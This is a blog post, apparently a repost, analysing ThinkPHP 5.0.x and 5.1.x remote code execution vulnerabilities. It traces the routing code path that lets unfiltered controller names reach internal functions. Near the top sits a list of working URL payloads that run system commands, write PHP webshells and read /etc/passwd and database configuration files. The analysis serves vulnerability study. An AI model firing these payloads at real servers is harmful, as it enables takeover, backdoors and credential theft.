Analysis of Thinkphp5.0.x Vulnerability Principle

Others 2021-03-31 16:28:06 views: null

This test environment uses php7.0.12+apache+thinkphp5.0.20

poc:http://127.0.0.1/tp5.0/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo '<?php @eval($_POST['aa']);?>' > 2.php
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][1]=<?php eval($_POST[nmsl]);?> # 写入shell

http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../application/database.php
http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../../../../../../../../../../../../../../etc/passwd
http://url/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_get_contents&vars[1][]=../application/config.php

版本号:5.0.8~5.0.19
payload:s=whoami&_method=__construct&filter&filter=system

版本号:5.0.20~5.0.23
payload:
http://url/?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUSET_METHOD]=whoami

Thinkphp 漏洞

该漏洞出现的原因在于ThinkPHP5框架底层对控制器名过滤不严,从而让攻击者可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

rce 漏洞的过程

$this->method可控导致可以调用__contruct()覆盖Request类的filter字段,然后App::run()执行判断debug来决定是否执行$request->param(),并且还有$dispatch['type'] 等于controller或者 method 时也会执行$request->param(),而$request->param()会进入到input()方法,在这个方法中将被覆盖的filter回调call_user_func(),造成rce。

5.1.x :

?s=index/\think\Request/input&filter[]=system&data=pwd

?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?> 

?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?> 

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars1=id

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars1=id

5.0.x

?s=index/think\config/get&name=database.username // 获取配置信息

?s=index/\think\Lang/load&file=../../test.jpg    // 包含任意文件

?s=index/\think\Config/load&file=../../t.php     // 包含任意.php文件

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars1=id

?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars1=whoami

可以看到payload分为两种类型,一种是因为Request类的method和__construct方法造成的,另一种是因为Request类在兼容模式下获取的控制器没有进行合法校验

参考自:https://y4er.com/post/thinkphp5-rce/

Insert picture description here
First look at the entry file, import the thinkphp/start.php file and
Insert picture description here
follow up thinkphp/start.php, and execute the run() method under think/App.php. The
Insert picture description here
reason for the vulnerability of thinkphp5.0.x is related to URL processing. Find think directly The URL routing detection part of the run() method in
Insert picture description here
/App.php follows the routeCheck() function. This function is to detect routing. The routeCheck() function judges whether the route is set in the url, because there is no routing definition and the return is different. URL scheduling, so he will go false
Insert picture description here
parseUrl() This function is used to parse variables $path(index/think\app/invokefunction), follow-up function, the function is the right $pathprocessing,'/' is replaced with'|', and left and right are removed clear space
Insert picture description here
after parseURL () function will $route($ route module has module, the controller controller, action method) returns an array of routeCheck to function, and then routeCheck () function returns the dispatch variable (run function)
Insert picture description here
Insert picture description here
vulnerability Right here, it’s not the execution method error, but the rigorous filtering of the url
Insert picture description here
. The type printed above is module, so it will go to the case'module', and follow the module method
Insert picture description here
to continue to follow the invokeMethod returned by the module method. The function
Insert picture description here
invokeMethod function
Insert picture description here
$args will get the remaining parameters in the POC function=call_user_func_array&vars[0]=system&vars[1][]=whoami value
call_user_func_array: Call the callback function, and use an array parameter as the parameter of the callback function.
Finally, the invokefunction method in the think/app class is executed through the reflection class IncokeArges()

The vulnerability occurs when there is no routing, when parseURL parses the routing, the URL is not rigorously filtered, resulting in (backslash think\app), which
Insert picture description here
eventually leads to the controller passing in the exec function as think\app, and finally passes $reflect->invokeArgs(isset($class) ? $class : null, $args)to resolve it. Classes and parameters, leading to command execution vulnerabilities.

Guess you like

Origin blog.csdn.net/weixin_45682070/article/details/108224794
Recommended
Ranking
ElasticSearch-- data modeling best practices
Permission Maintenance - Shadow User Backdoor
Refactor the code using MVP mode
Quantitative investment-fundamental model-PVC multi-factor model
Spark Big Data Processing Lecture Notes 3.2 Mastering RDD Operators
Blazor page components (2)
Erlernen von Kenntnissen zur Android-Entwicklung – Kodierung, Verschlüsselung, Hash, Serialisierung und Zeichensätze
About Qi high in JAVA study notes SORM summary detailed personal explanation
Will you calculate the accuracy of the rope displacement sensor in the measurement?
OPENJTAG debugging learning (3): debugging using the gdb command line
Daily
More
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)

Code World

© 2018 codetd.com